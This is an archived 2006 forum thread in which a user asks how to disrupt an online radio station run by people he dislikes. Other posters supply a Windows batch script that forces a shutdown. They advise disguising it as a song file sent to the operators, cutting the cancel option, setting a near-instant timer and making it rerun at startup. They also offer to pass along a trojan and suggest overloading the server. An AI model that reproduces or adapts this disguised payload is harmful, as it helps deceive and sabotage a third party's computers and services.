PDA

View Full Version : Hackin .pls files


Jabh
June 30th, 2006, 11:16 PM
Hey i just wanted to know if it's possible to hack a ".pls" file, or a more descriptive question, this idiots have a stupid radio station online with it, Z-Spot radio (google it, it is stupid), i just want to know if you can hack it, and shut it down on command whenever you want to, basically like whenever they start it up, i can stop it. If not then that's ok, but if you can please tell me

cabose
June 30th, 2006, 11:19 PM
if they are a request radio, then what you can do is make a batch file that when they open it it opens and opens and opens until it uses up all their ram and shuts down the computer, host it and send them a link to download it

Jabh
June 30th, 2006, 11:22 PM
I'm not really good with coding yet, i plan on learning it, but can you just tell me what code i need to make for that to work, as well as how it works?

cabose
June 30th, 2006, 11:24 PM
ill look it up, but yea start with that and then move top another idea which will be posted by more experianced ppls

cabose
June 30th, 2006, 11:35 PM
this is the best i can do and it might not work
@ECHO OFF

CLS

:Start
ECHO When do you want to shutdown?
ECHO Press number of choice followed by the Enter key
ECHO 1: Fifteen Minutes
ECHO 2: Thirty Minutes
ECHO 3: Sixty Minutes
ECHO 4: Quit

SET Choice=
SET /P Choice=""

IF '%Choice%'=='1' GOTO Fifteen
IF '%Choice%'=='2' GOTO Thirty
IF '%Choice%'=='3' GOTO Sixty
IF '%Choice%'=='4' GOTO End
CLS
ECHO "%Choice%" is not valid
ECHO Try again
GOTO Start

:Fifteen
SHUTDOWN -S -F -T 900
GOTO End

:Thirty
SHUTDOWN -S -F -T 1800
GOTO End

:Sixty
SHUTDOWN -S -F -T 3600
GOTO End

:End
CLS

Jabh
June 30th, 2006, 11:38 PM
thanks, but it seems that this file gives them a choice to when they want to stop, i want to know how to end it, as soon as they run it, as well as, i wanted to know where you learned ".bat" files from, as well as what are other good programming languages to learn to hack computers

cabose
June 30th, 2006, 11:38 PM
save that as randomsongnameofyourchoicehere.bat

cabose
June 30th, 2006, 11:44 PM
you can set those times to what you want and itll run as soon as click on it thinking it is a song so something like 2 seconds to shutdown would work,
i learned basic bat on hackthissite.org but that i got from basic google and copy/paste :lol:

cabose
June 30th, 2006, 11:48 PM
if you want me to and it is very very very very very important i could find a way to make it happen when they startup again so it just goes on goes off goes on goes off

Cuddles
July 1st, 2006, 01:10 AM
you can change that by removing the last choice so that they have to shutdown eventually......otherwise they're just gonna hit 4

and if you send them a song, make sure they have to download it, and they're using windows if it's a batch file (dont work on linux) cuz if they just run it, it will just fuckin shut down your host....you dont want that...i suggest you hack them....it's easier...

Jabh
July 1st, 2006, 07:35 PM
It may be easier to hack them, but i'm just learning, right now i know nothing about hacking, but am willing to learn. If you can tell me some good sites/books/any other resource to hack with that would be nice :D
Anyways thanks

cabose
July 2nd, 2006, 09:47 AM
i now have a trojan on my comp and if you ggive me ur aim itll send itself to ya...if u want :lol:

Cuddles
July 2nd, 2006, 04:31 PM
hahahahahahhahahahahahahahahha......i want that trojan on my linux comp.....but not on windows.....so yeah...im not accepting a direct connection from you.....ever....

cabose
July 2nd, 2006, 08:19 PM
i got it off it was a weak one, clear temp internet files wow soo hard

cabose
July 2nd, 2006, 08:26 PM
thats the "smart" way to do it but this is fun-er

Cuddles
July 2nd, 2006, 08:29 PM
overloading the server would be too damn easy for these people....

cabose
July 2nd, 2006, 09:36 PM
so yea take the fun way :lol: easy isnt fun easy is *****g fun is fun do fun way :lol:

cabose
July 7th, 2006, 03:17 AM
did you ever do it?